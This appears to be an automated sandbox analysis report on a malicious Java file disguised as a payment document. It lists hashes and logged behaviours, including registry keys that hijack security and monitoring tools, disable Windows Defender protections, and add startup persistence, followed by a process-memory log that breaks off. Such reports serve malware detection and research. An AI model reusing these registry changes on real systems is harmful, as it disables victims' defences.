Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows7_x64 -
resource
win7 -
submitted
07/07/2020, 18:22
Static task
static1
Behavioral task
behavioral1
Sample
07072020-Payment.jar
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
07072020-Payment.jar
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
07072020-Payment.jar
-
Size
406KB
-
MD5
6b2bffb955ed0df1fd3d239fcbbcbf3d
-
SHA1
22e1f5e279b30023c131260c82e66777afcc4e53
-
SHA256
8510f0b1edfeb2313ecc62eeb689e7bd91a3751e9221347572d2a74d94b3fc81
-
SHA512
1ca70934661f12da702aea00fcd66c369ff5b97a121ab295c7c276cd8285832dcc30a98d65bdda48d3225d6e3f9dcad0b0e141a1d863eed153f057a4934f4781
Score
10/10
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
pid Process 1164 java.exe -
Sets file execution options in registry 2 TTPs 38 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe reg.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File created C:\Users\Admin\PXBiH\Desktop.ini java.exe File opened for modification C:\Users\Admin\PXBiH\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\PXBiH\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\PXBiH\Desktop.ini java.exe -
Kills process with taskkill 19 IoCs
pid Process 576 taskkill.exe 1660 taskkill.exe 1264 taskkill.exe 1100 taskkill.exe 1816 taskkill.exe 1312 taskkill.exe 1556 taskkill.exe 1056 taskkill.exe 1520 taskkill.exe 1964 taskkill.exe 1832 taskkill.exe 1536 taskkill.exe 2036 taskkill.exe 1496 taskkill.exe 1496 taskkill.exe 892 taskkill.exe 1632 taskkill.exe 1064 taskkill.exe 1648 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 100 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 764 WMIC.exe Token: SeSecurityPrivilege 764 WMIC.exe Token: SeTakeOwnershipPrivilege 764 WMIC.exe Token: SeLoadDriverPrivilege 764 WMIC.exe Token: SeSystemProfilePrivilege 764 WMIC.exe Token: SeSystemtimePrivilege 764 WMIC.exe Token: SeProfSingleProcessPrivilege 764 WMIC.exe Token: SeIncBasePriorityPrivilege 764 WMIC.exe Token: SeCreatePagefilePrivilege 764 WMIC.exe Token: SeBackupPrivilege 764 WMIC.exe Token: SeRestorePrivilege 764 WMIC.exe Token: SeShutdownPrivilege 764 WMIC.exe Token: SeDebugPrivilege 764 WMIC.exe Token: SeSystemEnvironmentPrivilege 764 WMIC.exe Token: SeRemoteShutdownPrivilege 764 WMIC.exe Token: SeUndockPrivilege 764 WMIC.exe Token: SeManageVolumePrivilege 764 WMIC.exe Token: 33 764 WMIC.exe Token: 34 764 WMIC.exe Token: 35 764 WMIC.exe Token: SeIncreaseQuotaPrivilege 764 WMIC.exe Token: SeSecurityPrivilege 764 WMIC.exe Token: SeTakeOwnershipPrivilege 764 WMIC.exe Token: SeLoadDriverPrivilege 764 WMIC.exe Token: SeSystemProfilePrivilege 764 WMIC.exe Token: SeSystemtimePrivilege 764 WMIC.exe Token: SeProfSingleProcessPrivilege 764 WMIC.exe Token: SeIncBasePriorityPrivilege 764 WMIC.exe Token: SeCreatePagefilePrivilege 764 WMIC.exe Token: SeBackupPrivilege 764 WMIC.exe Token: SeRestorePrivilege 764 WMIC.exe Token: SeShutdownPrivilege 764 WMIC.exe Token: SeDebugPrivilege 764 WMIC.exe Token: SeSystemEnvironmentPrivilege 764 WMIC.exe Token: SeRemoteShutdownPrivilege 764 WMIC.exe Token: SeUndockPrivilege 764 WMIC.exe Token: SeManageVolumePrivilege 764 WMIC.exe Token: 33 764 WMIC.exe Token: 34 764 WMIC.exe Token: 35 764 WMIC.exe Token: SeIncreaseQuotaPrivilege 1080 WMIC.exe Token: SeSecurityPrivilege 1080 WMIC.exe Token: SeTakeOwnershipPrivilege 1080 WMIC.exe Token: SeLoadDriverPrivilege 1080 WMIC.exe Token: SeSystemProfilePrivilege 1080 WMIC.exe Token: SeSystemtimePrivilege 1080 WMIC.exe Token: SeProfSingleProcessPrivilege 1080 WMIC.exe Token: SeIncBasePriorityPrivilege 1080 WMIC.exe Token: SeCreatePagefilePrivilege 1080 WMIC.exe Token: SeBackupPrivilege 1080 WMIC.exe Token: SeRestorePrivilege 1080 WMIC.exe Token: SeShutdownPrivilege 1080 WMIC.exe Token: SeDebugPrivilege 1080 WMIC.exe Token: SeSystemEnvironmentPrivilege 1080 WMIC.exe Token: SeRemoteShutdownPrivilege 1080 WMIC.exe Token: SeUndockPrivilege 1080 WMIC.exe Token: SeManageVolumePrivilege 1080 WMIC.exe Token: 33 1080 WMIC.exe Token: 34 1080 WMIC.exe Token: 35 1080 WMIC.exe Token: SeIncreaseQuotaPrivilege 1080 WMIC.exe Token: SeSecurityPrivilege 1080 WMIC.exe Token: SeTakeOwnershipPrivilege 1080 WMIC.exe Token: SeLoadDriverPrivilege 1080 WMIC.exe Token: SeSystemProfilePrivilege 1080 WMIC.exe Token: SeSystemtimePrivilege 1080 WMIC.exe Token: SeProfSingleProcessPrivilege 1080 WMIC.exe Token: SeIncBasePriorityPrivilege 1080 WMIC.exe Token: SeCreatePagefilePrivilege 1080 WMIC.exe Token: SeBackupPrivilege 1080 WMIC.exe Token: SeRestorePrivilege 1080 WMIC.exe Token: SeShutdownPrivilege 1080 WMIC.exe Token: SeDebugPrivilege 1080 WMIC.exe Token: SeSystemEnvironmentPrivilege 1080 WMIC.exe Token: SeRemoteShutdownPrivilege 1080 WMIC.exe Token: SeUndockPrivilege 1080 WMIC.exe Token: SeManageVolumePrivilege 1080 WMIC.exe Token: 33 1080 WMIC.exe Token: 34 1080 WMIC.exe Token: 35 1080 WMIC.exe Token: SeDebugPrivilege 1556 taskkill.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 1264 taskkill.exe Token: SeDebugPrivilege 1100 taskkill.exe Token: SeDebugPrivilege 1816 taskkill.exe Token: SeDebugPrivilege 1064 taskkill.exe Token: SeDebugPrivilege 1648 taskkill.exe Token: SeDebugPrivilege 1496 taskkill.exe Token: SeDebugPrivilege 576 taskkill.exe Token: SeDebugPrivilege 1520 taskkill.exe Token: SeDebugPrivilege 1312 taskkill.exe Token: SeDebugPrivilege 1536 taskkill.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 1496 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 892 taskkill.exe -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1808 attrib.exe 1856 attrib.exe 1800 attrib.exe 1872 attrib.exe 1720 attrib.exe 1828 attrib.exe 1840 attrib.exe 1264 attrib.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks for installed software on the system 1 TTPs 52 IoCs
description ioc Process Key enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-1000-0000000FF1CE}\DisplayName reg.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall reg.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall reg.exe Key opened \REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName reg.exe Key opened \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall reg.exe Key opened \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName reg.exe Key enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0000-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName reg.exe Key opened \REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\uninstall reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-1000-0000000FF1CE}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1644 powershell.exe 1644 powershell.exe -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\SaveZoneInformation = "-" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes = "-" reg.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1164 java.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\jGFVz java.exe File opened for modification C:\Windows\System32\jGFVz java.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Adds Run entry to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ulXOkad = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\PXBiH\\qMaee.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\ulXOkad = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\PXBiH\\qMaee.class\"" java.exe -
Suspicious use of WriteProcessMemory 798 IoCs
description pid Process procid_target PID 1164 wrote to memory of 1628 1164 java.exe 25 PID 1164 wrote to memory of 1628 1164 java.exe 25 PID 1164 wrote to memory of 1628 1164 java.exe 25 PID 1164 wrote to memory of 804 1164 java.exe 26 PID 1164 wrote to memory of 804 1164 java.exe 26 PID 1164 wrote to memory of 804 1164 java.exe 26 PID 804 wrote to memory of 764 804 cmd.exe 27 PID 804 wrote to memory of 764 804 cmd.exe 27 PID 804 wrote to memory of 764 804 cmd.exe 27 PID 1164 wrote to memory of 1104 1164 java.exe 28 PID 1164 wrote to memory of 1104 1164 java.exe 28 PID 1164 wrote to memory of 1104 1164 java.exe 28 PID 1104 wrote to memory of 1080 1104 cmd.exe 29 PID 1104 wrote to memory of 1080 1104 cmd.exe 29 PID 1104 wrote to memory of 1080 1104 cmd.exe 29 PID 1164 wrote to memory of 1720 1164 java.exe 30 PID 1164 wrote to memory of 1720 1164 java.exe 30 PID 1164 wrote to memory of 1720 1164 java.exe 30 PID 1164 wrote to memory of 1828 1164 java.exe 31 PID 1164 wrote to memory of 1828 1164 java.exe 31 PID 1164 wrote to memory of 1828 1164 java.exe 31 PID 1164 wrote to memory of 1840 1164 java.exe 32 PID 1164 wrote to memory of 1840 1164 java.exe 32 PID 1164 wrote to memory of 1840 1164 java.exe 32 PID 1164 wrote to memory of 1264 1164 java.exe 33 PID 1164 wrote to memory of 1264 1164 java.exe 33 PID 1164 wrote to memory of 1264 1164 java.exe 33 PID 1164 wrote to memory of 1808 1164 java.exe 34 PID 1164 wrote to memory of 1808 1164 java.exe 34 PID 1164 wrote to memory of 1808 1164 java.exe 34 PID 1164 wrote to memory of 1856 1164 java.exe 35 PID 1164 wrote to memory of 1856 1164 java.exe 35 PID 1164 wrote to memory of 1856 1164 java.exe 35 PID 1164 wrote to memory of 1800 1164 java.exe 36 PID 1164 wrote to memory of 1800 1164 java.exe 36 PID 1164 wrote to memory of 1800 1164 java.exe 36 PID 1164 wrote to memory of 1872 1164 java.exe 37 PID 1164 wrote to memory of 1872 1164 java.exe 37 PID 1164 wrote to memory of 1872 1164 java.exe 37 PID 1164 wrote to memory of 1656 1164 java.exe 38 PID 1164 wrote to memory of 1656 1164 java.exe 38 PID 1164 wrote to memory of 1656 1164 java.exe 38 PID 1164 wrote to memory of 1644 1164 java.exe 39 PID 1164 wrote to memory of 1644 1164 java.exe 39 PID 1164 wrote to memory of 1644 1164 java.exe 39 PID 1164 wrote to memory of 1556 1164 java.exe 40 PID 1164 wrote to memory of 1556 1164 java.exe 40 PID 1164 wrote to memory of 1556 1164 java.exe 40 PID 1164 wrote to memory of 1588 1164 java.exe 41 PID 1164 wrote to memory of 1588 1164 java.exe 41 PID 1164 wrote to memory of 1588 1164 java.exe 41 PID 1164 wrote to memory of 1924 1164 java.exe 42 PID 1164 wrote to memory of 1924 1164 java.exe 42 PID 1164 wrote to memory of 1924 1164 java.exe 42 PID 1656 wrote to memory of 1904 1656 cmd.exe 43 PID 1656 wrote to memory of 1904 1656 cmd.exe 43 PID 1656 wrote to memory of 1904 1656 cmd.exe 43 PID 1164 wrote to memory of 1952 1164 java.exe 47 PID 1164 wrote to memory of 1952 1164 java.exe 47 PID 1164 wrote to memory of 1952 1164 java.exe 47 PID 1164 wrote to memory of 2016 1164 java.exe 49 PID 1164 wrote to memory of 2016 1164 java.exe 49 PID 1164 wrote to memory of 2016 1164 java.exe 49 PID 1656 wrote to memory of 544 1656 cmd.exe 51 PID 1656 wrote to memory of 544 1656 cmd.exe 51 PID 1656 wrote to memory of 544 1656 cmd.exe 51 PID 1164 wrote to memory of 2028 1164 java.exe 52 PID 1164 wrote to memory of 2028 1164 java.exe 52 PID 1164 wrote to memory of 2028 1164 java.exe 52 PID 1164 wrote to memory of 624 1164 java.exe 53 PID 1164 wrote to memory of 624 1164 java.exe 53 PID 1164 wrote to memory of 624 1164 java.exe 53 PID 1164 wrote to memory of 592 1164 java.exe 56 PID 1164 wrote to memory of 592 1164 java.exe 56 PID 1164 wrote to memory of 592 1164 java.exe 56 PID 1164 wrote to memory of 524 1164 java.exe 55 PID 1164 wrote to memory of 524 1164 java.exe 55 PID 1164 wrote to memory of 524 1164 java.exe 55 PID 1164 wrote to memory of 584 1164 java.exe 57 PID 1164 wrote to memory of 584 1164 java.exe 57 PID 1164 wrote to memory of 584 1164 java.exe 57 PID 1164 wrote to memory of 612 1164 java.exe 61 PID 1164 wrote to memory of 612 1164 java.exe 61 PID 1164 wrote to memory of 612 1164 java.exe 61 PID 1164 wrote to memory of 1084 1164 java.exe 62 PID 1164 wrote to memory of 1084 1164 java.exe 62 PID 1164 wrote to memory of 1084 1164 java.exe 62 PID 1164 wrote to memory of 1532 1164 java.exe 65 PID 1164 wrote to memory of 1532 1164 java.exe 65 PID 1164 wrote to memory of 1532 1164 java.exe 65 PID 1164 wrote to memory of 1836 1164 java.exe 66 PID 1164 wrote to memory of 1836 1164 java.exe 66 PID 1164 wrote to memory of 1836 1164 java.exe 66 PID 1164 wrote to memory of 1860 1164 java.exe 69 PID 1164 wrote to memory of 1860 1164 java.exe 69 PID 1164 wrote to memory of 1860 1164 java.exe 69 PID 1164 wrote to memory of 1632 1164 java.exe 70 PID 1164 wrote to memory of 1632 1164 java.exe 70 PID 1164 wrote to memory of 1632 1164 java.exe 70 PID 1164 wrote to memory of 1856 1164 java.exe 72 PID 1164 wrote to memory of 1856 1164 java.exe 72 PID 1164 wrote to memory of 1856 1164 java.exe 72 PID 1164 wrote to memory of 1104 1164 java.exe 74 PID 1164 wrote to memory of 1104 1164 java.exe 74 PID 1164 wrote to memory of 1104 1164 java.exe 74 PID 1164 wrote to memory of 1936 1164 java.exe 77 PID 1164 wrote to memory of 1936 1164 java.exe 77 PID 1164 wrote to memory of 1936 1164 java.exe 77 PID 1164 wrote to memory of 1988 1164 java.exe 78 PID 1164 wrote to memory of 1988 1164 java.exe 78 PID 1164 